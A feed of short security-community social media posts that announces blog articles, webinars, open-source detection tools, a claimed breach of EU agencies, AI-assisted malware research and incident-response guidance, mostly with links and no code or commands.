TIL ssh added keystroke timing obfuscation in 2023. Sends garbage packets to avoid revealing what you may be typing based on timing patterns.
Another great blog post by @itseieio
https://t.co/kKybIKygbZ
🚨 MASSIVE CYBERATTACK: The EU Commission, ENISA, and the DG for Digital Services have been compromised by threat actor ShinyHunters.
Leaked data includes:
▪️ Emails & attachments
▪️ Full SSO user directory
▪️ DKIM signing keys
▪️ AWS config snapshots
▪️ NextCloud/Athena data
▪️ Internal admin URLs
It's a mess!
The recording of my first Binary Cartography webinar is now public:
Agentic Reverse Engineering: How AI Agents Are Changing Binary Analysis
Topics: keygenning, cracking & anti-tamper removal
Recording: https://t.co/dheTSRkJqP
Slides/code/samples: https://t.co/nAqtcqVs7i
We open-sourced DetectFlow, a detection intelligence engine that runs Sigma detections on Kafka streams via Flink. Thousands of rules, millisecond matching, before data hits the SIEM. No vendor lock-in. Works air-gapped.
Get repo here: https://t.co/LOqKximbje
#soc
I am pleased to announce the publication of the sixth article in the Exploiting Reversing Series (ERS).
Titled "A Deep Dive Into Exploiting a Minifilter Driver (N-day)", this 251-page article provides a comprehensive look at a past vulnerability in a mini-filter driver:
https://t.co/Sh8pgB4bh8
It guides readers through the entire investigation process—beginning with binary diffing and moving through reverse engineering, deep analysis and proof-of-concept stages into full exploit development.
I hope this serves as a valuable resource for your research. If you enjoy the content, please feel free to share it or reach out with feedback.
Have an excellent day!
#Voidlink, A new era of malware has arrived! We discovered that the framework was built nearly end-to-end using agentic AI. It stands as an alarming example of what experienced actors are capable of using artificial intelligence.
https://t.co/4cGE620Nrd
📦 I just released Security-Detections MCP
- a way to let LLMs reason over real detection content, not just the internet.
This isn’t "AI writes detections for you."
It’s:
• Threat report in
• Coverage + gaps out
• Grounded in actual rules (KQL, SPL, Sigma, internal content)
The MCP indexes your detection corpus and exposes it in a way LLMs can query, compare, validate, and explain.
What this enables:
• Faster detection validation
• Identifying blind spots before adversaries do
• Structured markdown reports you can actually act on
• Humans stay in control — AI becomes the force multiplier
Repo ➡️ https://t.co/hF5mrvTJkT
👇Video walkthrough 👇 https://t.co/lp5MW3r6ur
If you’re doing detection engineering, threat hunting, or maintaining a large rule set - this changes how fast you can move.
More coming. This is just the start.
I analyzed thousands of messages from 35+ suspected state-sponsored hacktivist groups using machine learning—uncovering hidden connections through writing styles, language and topics.
After a year of research, here’s what we found and how we did it. 👇
https://t.co/KUnIhAmuRa
1/
Attack Simulation in Defender for Office 365 now includes new "how to" guides that can be sent to end users to educate them on how to complete security related tasks
https://t.co/PGVDwBDkpX
Voilà un projet Open Source qui n'a pas peur de la croissance ! Une liste de lecture pour une scalabilité fiable et performante.
https://t.co/ce4sQTt6jx
Speedbump : Un proxy TCP Open Source pour simuler une latence réseau variable mais prévisible. Il permet aux développeurs de comprendre et gérer la latence dans les environnements de réseau. (p)
https://t.co/ubpuqyLxIw
The Microsoft Incident Response team just published this amazing playbook which shares best practices for security teams and leaders.
Download it from https://t.co/o5uvjfqJ0H